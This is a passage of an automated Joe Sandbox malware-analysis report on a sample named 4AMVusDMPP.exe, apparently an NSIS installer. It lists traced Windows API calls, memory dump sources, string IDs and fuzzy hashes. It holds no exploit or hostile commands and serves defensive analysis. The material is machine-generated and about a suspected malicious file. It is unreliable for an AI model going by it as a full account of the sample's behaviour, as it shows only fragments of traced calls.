                                                          • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                          • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                            • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\4AMVusDMPP.exe,80000000,00000003), ref: 00405EE2
                                                            • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %ls=%ls$[Rename]
                                                          • API String ID: 2171350718-461813615
                                                          • Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                          • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                          • Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                          • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                          • GetSysColor.USER32(00000000), ref: 00404421
                                                          • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                          • SetBkMode.GDI32(?,?), ref: 00404439
                                                          • GetSysColor.USER32(?), ref: 0040444C
                                                          • SetBkColor.GDI32(?,?), ref: 0040445C
                                                          • DeleteObject.GDI32(?), ref: 00404476
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                          • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                          • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                          • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                          APIs
                                                          • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                          • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                          • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                          • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                          • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                          • Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                          • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                          • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                          • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-2950451457
                                                          • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                          • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                          • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                          • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                          • GetTickCount.KERNEL32 ref: 00402EC7
                                                          • wsprintfW.USER32 ref: 00402EF5
                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                            • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                            • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                            • Part of subcall function 00402E72: MulDiv.KERNEL32(00016390,00000064,00018D7D), ref: 00402E87
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                          • String ID: ... %d%%
                                                          • API String ID: 722711167-2449383134
                                                          • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                          • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                          • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                          • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                          • GetMessagePos.USER32 ref: 00404D3D
                                                          • ScreenToClient.USER32(?,?), ref: 00404D57
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                          • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                          • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                          • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                          • wsprintfW.USER32 ref: 00402E45
                                                          • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                          • API String ID: 1451636040-1158693248
                                                          • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                          • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                          • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                          • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                          APIs
                                                            • Part of subcall function 6EAB121B: GlobalAlloc.KERNELBASE(00000040,?,6EAB123B,?,6EAB12DF,00000019,6EAB11BE,-000000A0), ref: 6EAB1225
                                                          • GlobalFree.KERNEL32(?), ref: 6EAB2657
                                                          • GlobalFree.KERNEL32(00000000), ref: 6EAB268C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1764566843.000000006EAB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EAB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1764543418.000000006EAB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1764585429.000000006EAB4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1764610050.000000006EAB6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6eab0000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: bb6187d69716f0cd67e8133cb85cc4ea2abdd61eb98c379194c426dd57771aca
                                                          • Instruction ID: b71fd960ccead8e693c338b07ae09dcb058d1d423278abffccb3af73600c0ed8
                                                          • Opcode Fuzzy Hash: bb6187d69716f0cd67e8133cb85cc4ea2abdd61eb98c379194c426dd57771aca
                                                          • Instruction Fuzzy Hash: 5031CD31904601DFCB148F98C8A4C6A7BBEFF8630471586AAF5419B260E7349C96CB29
                                                          APIs
                                                          • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                          • wsprintfW.USER32 ref: 00404CB6
                                                          • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s$(7B
                                                          • API String ID: 3540041739-1320723960
                                                          • Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                          • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                          • Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                          • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsc34E8.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsc34E8.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWidelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsc34E8.tmp$C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dll
                                                          • API String ID: 3109718747-997066553
                                                          • Opcode ID: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                          • Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
                                                          • Opcode Fuzzy Hash: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                          • Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1764566843.000000006EAB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EAB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1764543418.000000006EAB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1764585429.000000006EAB4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1764610050.000000006EAB6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6eab0000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: FreeGlobal
                                                          • String ID:
                                                          • API String ID: 2979337801-0
                                                          • Opcode ID: 97dbd4792118fc9470dcd73a609fcd01680607c51e21deda42927cae4d26b044
                                                          • Instruction ID: 8d01cb560023a0545a23a74334ace5dff5b3f3a46ecc6bf17bc13e0eaf0d33ae
                                                          • Opcode Fuzzy Hash: 97dbd4792118fc9470dcd73a609fcd01680607c51e21deda42927cae4d26b044
                                                          • Instruction Fuzzy Hash: 81510631D1005AAE8B409FE985C05BEBBBDEF65314B54425ED400A3204D772BEC987AD
                                                          APIs
                                                          • GlobalFree.KERNEL32(00000000), ref: 6EAB24D6
                                                            • Part of subcall function 6EAB122C: lstrcpynW.KERNEL32(00000000,?,6EAB12DF,00000019,6EAB11BE,-000000A0), ref: 6EAB123C
                                                          • GlobalAlloc.KERNEL32(00000040), ref: 6EAB245C
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6EAB2477
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1764566843.000000006EAB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EAB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1764543418.000000006EAB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1764585429.000000006EAB4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1764610050.000000006EAB6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6eab0000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                          • String ID:
                                                          • API String ID: 4216380887-0
                                                          • Opcode ID: 8083b59309b82d6a50fe7367600a47680ae7eaaa759dc4bb8294224db4045607
                                                          • Instruction ID: af91af7aa0cbe86092c516ce7556d85006e6c6c592d27a64ee4a515b6bd23f33
                                                          • Opcode Fuzzy Hash: 8083b59309b82d6a50fe7367600a47680ae7eaaa759dc4bb8294224db4045607
                                                          • Instruction Fuzzy Hash: 0341BFB0408705DFD710DFA5D844AA677BCFF5A310F10892EE4468BA51EB74A8C6CB79
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401DBC
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                          • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID:
                                                          • API String ID: 3808545654-0
                                                          • Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                          • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                          • Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                          • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6EAB21EC,?,00000808), ref: 6EAB1635
                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6EAB21EC,?,00000808), ref: 6EAB163C
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6EAB21EC,?,00000808), ref: 6EAB1650
                                                          • GetProcAddress.KERNEL32(6EAB21EC,00000000), ref: 6EAB1657
                                                          • GlobalFree.KERNEL32(00000000), ref: 6EAB1660
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1764566843.000000006EAB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EAB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1764543418.000000006EAB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1764585429.000000006EAB4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1764610050.000000006EAB6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6eab0000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                          • String ID:
                                                          • API String ID: 1148316912-0
                                                          • Opcode ID: 7659cb2a5d8d579fb7173bef72d9288f2674ea7cb7cd6e58f2d6e74de03a9f34
                                                          • Instruction ID: 202ec9c9ad4114c126d5610fc77635b9c3e95038117c383782794de0bc039981
                                                          • Opcode Fuzzy Hash: 7659cb2a5d8d579fb7173bef72d9288f2674ea7cb7cd6e58f2d6e74de03a9f34
                                                          • Instruction Fuzzy Hash: 92F01C7260A6387BDA2016A68C4CC9BBE9CDF8B2F5B124211F628A21A0D6654C03D7F1
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401D63
                                                          • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                          • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
